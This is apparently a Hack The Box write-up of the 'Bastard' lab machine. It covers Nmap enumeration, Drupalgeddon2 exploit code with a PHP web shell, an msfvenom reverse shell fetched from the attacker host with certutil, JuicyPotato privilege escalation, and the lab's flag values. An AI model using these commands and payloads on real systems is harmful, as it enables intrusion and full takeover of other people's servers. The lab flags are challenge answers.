Nmap Results
# Nmap 7.92 scan initiated Tue Aug 16 00:34:56 2022 as: nmap -T5 -p80,135,49154 -A -oA scan-all -Pn 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 15.45 ms 10.10.14.1
2 15.71 ms 10.10.10.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 16 00:36:10 2022 -- 1 IP address (1 host up) scanned in 74.38 seconds
Service Enumeration
TCP/80
Good info from the nmap scan:
- http-server-header: Microsoft-IIS/7.5
- http-generator: Drupal 7

I check out the /robots.txt file and note the /CHANGELOG.txt entry. Opening it in the browser, it discloses a precise version number, so I take note of that for exploit research. Drupal 7 ships CHANGELOG.txt in the web root with the release version on its first line, which is exactly why it is disallowed in robots.txt and exactly why it is worth fetching directly.

I tried to enumerate more files and folders with gobuster and feroxbuster, but the web server is throttling my requests. So I'll focus on researching vulnerabilities for this version of Drupal instead.
Let's see what kind of exploits are available in Exploit DB. I am going to filter out authenticated and Metasploit exploits because:
- We do not have a valid set of credentials
- Doing this as OSCP prep, so trying to limit Metasploit usage
searchsploit Drupal 7 | grep -viE 'authenticated|metasploit'
This exploit looks like it could work for the version of Drupal on the target:
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Let's copy the exploit to the current working directory:
searchsploit -m 44449
Now, let's examine the exploit:
- The exploit makes a request to the user registration form; the URL it uses depends on whether Drupal clean URLs are enabled.
# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register
- Then, the exploit crafts a URL and payload depending on the Drupal version.
- For Drupal 7, the payload is injected into the name element of the form (the Drupal 7 branch of the script targets the password-reset form, user/password, and abuses the Form API's #post_render callback so that the markup value is handed to a PHP function such as passthru):
# Function gen_evil_url <cmd> [method] [shell] [phpfunction]
def gen_evil_url(evil, element="", shell=false, phpfunction="passthru")
- Next, the exploit tests code execution through the web form by injecting a random string into the name field. If the server responds HTTP 200 or HTTP 500 and there is a response body, we should be good to exploit:
# Generate a random string to see if we can echo it
random = (0...8).map { (65 + rand(26)).chr }.join
url, payload = gen_evil_url("echo #{random}", e)
response = http_request(url, "post", payload, $session_cookie)
if (response.code == "200" or response.code == "500") and not response.body.empty?
- Finally, the exploit injects a PHP backdoor via the same form field and writes it to shell.php in the web root:
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
# Test to see if backdoor is there (if we managed to write it)
response = http_request("#{$target}#{webshellpath}", "post", "c=hostname", $session_cookie)
if response.code == "200" and not response.body.empty?
puts success("Very Good News Everyone! Wrote to the web root! Waayheeeey!!!")
break
# Forever loop
loop do
# Default value
result = "~ERROR~"
# Get input
command = Readline.readline("#{prompt}>> ", true).to_s
# Check input
puts warning("WARNING: Detected an known bad character (>)") if command =~ />/
# Exit
break if command == "exit"
...
...
...
Exploit
You may need to install a required Ruby dependency to use this exploit:
sudo gem install highline
Then, run the exploit:
ruby 44449.rb http://10.10.10.9

Post-Exploit Enumeration
The first order of business will be to get a more reliable shell. I am going to double-check the target system architecture and generate a reverse shell payload using msfvenom that I can execute as needed through the PHP pseudo-shell.
drupalgeddon2 >> systeminfo
System Type: x64-based PC
Now, generate a reverse shell payload.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -a x64 --platform windows -e x64/xor_dynamic -b '\x00' -f exe -o shell.exe
Start a Python web server to transfer the file to the target:
sudo python3 -m http.server 80
Use the PHP pseudo-shell to download the file to the target:
certutil.exe -urlcache -split -f http://kali-vpn-ip/shell.exe C:\Windows\Temp\shell.exe
Start a listener and run the exploit:
sudo nc -lnvp <kali-tcp-port>
drupalgeddon2 >> cmd.exe /c C:\Windows\Temp\shell.exe

Current User
USER INFORMATION
----------------
User Name SID
================= ========
nt authority\iusr S-1-5-17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
OS & Kernel
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3582622-84461
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 16/8/2022, 7:32:24
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.494 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.512 MB
Virtual Memory: In Use: 583 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
Users
AccountType Domain Name Disabled
----------- ------ ---- --------
512 BASTARD Administrator False
512 BASTARD dimitris False
512 BASTARD Guest True
Groups
Domain Name
------ ----
BASTARD Administrators
BASTARD Backup Operators
BASTARD Certificate Service DCOM Access
BASTARD Cryptographic Operators
BASTARD Distributed COM Users
BASTARD Event Log Readers
BASTARD Guests
BASTARD IIS_IUSRS
BASTARD Network Configuration Operators
BASTARD Performance Log Users
BASTARD Performance Monitor Users
BASTARD Power Users
BASTARD Print Operators
BASTARD Remote Desktop Users
BASTARD Replicator
BASTARD Users
Network
Interfaces
Windows IP Configuration
Host Name . . . . . . . . . . . . : Bastard
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-42-2D
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.10.10.9(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
DNS Servers . . . . . . . . . . . : 10.10.10.2
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{56FEC108-3F71-4327-BF45-2B4EE355CD0F}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
ARP Table
N/A
Routes
N/A
Open Ports
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:81 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1072
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 372
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 744
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 796
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 480
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 496
TCP 10.10.10.9:139 0.0.0.0:0 LISTENING 4
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:81 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 668
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 372
TCP [::]:49153 [::]:0 LISTENING 744
TCP [::]:49154 [::]:0 LISTENING 796
TCP [::]:49155 [::]:0 LISTENING 480
TCP [::]:49156 [::]:0 LISTENING 496
Ping Sweep
N/A
Processes
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
32 5 964 2580 26 0,00 1852 conhost
615 11 2160 4296 49 328 csrss
70 9 5952 5752 46 388 csrss
199 16 4368 11336 56 1868 dllhost
0 0 0 24 0 0 Idle
164 25 7488 15412 86 756 LogonUI
553 20 4336 10364 45 496 lsass
136 7 2244 3784 17 504 lsm
148 18 3412 7724 60 1984 msdtc
564 16 54320 42044 115 1072 mysqld
117 18 21852 27620 118 1456 php-cgi
331 26 59644 60692 552 1,56 2172 powershell
186 12 3608 7424 32 480 services
30 2 440 1052 5 236 smss
265 19 6056 10768 80 320 spoolsv
293 32 9340 11956 55 276 svchost
347 14 3944 9280 45 596 svchost
218 16 3468 7632 37 668 svchost
275 15 8104 10388 47 744 svchost
914 40 19732 32324 124 796 svchost
519 21 6304 11428 47 844 svchost
91 8 1640 4932 30 888 svchost
416 27 10300 14456 96 928 svchost
95 10 4024 8548 41 1040 svchost
44 4 928 2592 13 1192 svchost
146 14 7144 10896 46 1344 svchost
434 0 112 304 3 4 System
97 11 4628 10404 63 1228 VGAuthService
278 23 9480 18856 86 1316 vmtoolsd
175 26 6384 12876 62 2828 w3wp
77 10 1480 4184 48 372 wininit
74 6 1452 4104 25 436 winlogon
106 9 2304 5816 36 244 WmiPrvSE
239 16 8924 14520 56 1620 WmiPrvSE
Scheduled Tasks
Nothing outside of default system tasks
Privilege Escalation
Looking at the output of the whoami command, the first thing that stuck out to me is SeImpersonatePrivilege, which immediately makes me think JuicyPotato. The OS version backs that up: Server 2008 R2 build 7600 with no hotfixes is well inside the range where JuicyPotato's DCOM/NTLM reflection trick still works (it stopped working on Windows 10 1809 / Server 2019 and later).
The privilege escalation process will look like this:
- Download the 64-bit JuicyPotato.exe binary to Kali
- Transfer it to the target using a Python web server
- Find a CLSID for a COM service that runs as SYSTEM on this OS
- Start a listener on Kali
- Run JuicyPotato.exe and re-use the PowerShell reverse shell payload we already put on the host at C:\Windows\Temp\shell.exe
First step is to download JuicyPotato.exe and spin up the Python web server:
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
sudo python3 -m http.server 80
Now, let's download it to the target using our PowerShell reverse shell:
(New-Object Net.WebClient).DownloadFile('http://kali-vpn-ip/JuicyPotato.exe', 'C:\Windows\Temp\JuicyPotato.exe')
You can find a list of CLSIDs for Windows Server 2008 R2 in the CLSID directory of the juicy-potato GitHub repository. Choose a CLSID whose COM server runs as NT AUTHORITY\SYSTEM; a CLSID that runs as a lower-privileged service account will spawn the process, but not as SYSTEM.
Start a listener on Kali and run the exploit. We are going to re-use our PowerShell reverse shell payload, so use the same TCP port as before.
sudo nc -lnvp <kali-tcp-port>
We'll use JuicyPotato.exe to run cmd.exe as SYSTEM, which in turn launches our reverse shell. -l is the local port JuicyPotato's COM server listens on, so pick one that is not already bound on the target (4444 does not appear in the netstat output above), and -t * tells it to try both CreateProcessWithTokenW and CreateProcessAsUser. The single quotes are fine because this is typed into the PowerShell reverse shell; cmd.exe would pass them through literally.
C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a '/c C:\Windows\Temp\shell.exe' -l 4444 -t * -c '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}'

Flags
C:\Users\dimitris\Desktop\user.txt
d74dd2dd6d42153770e0acbed24eb314
C:\Users\Administrator\Desktop\root.txt
176631de8dd060d1c027607d0639471c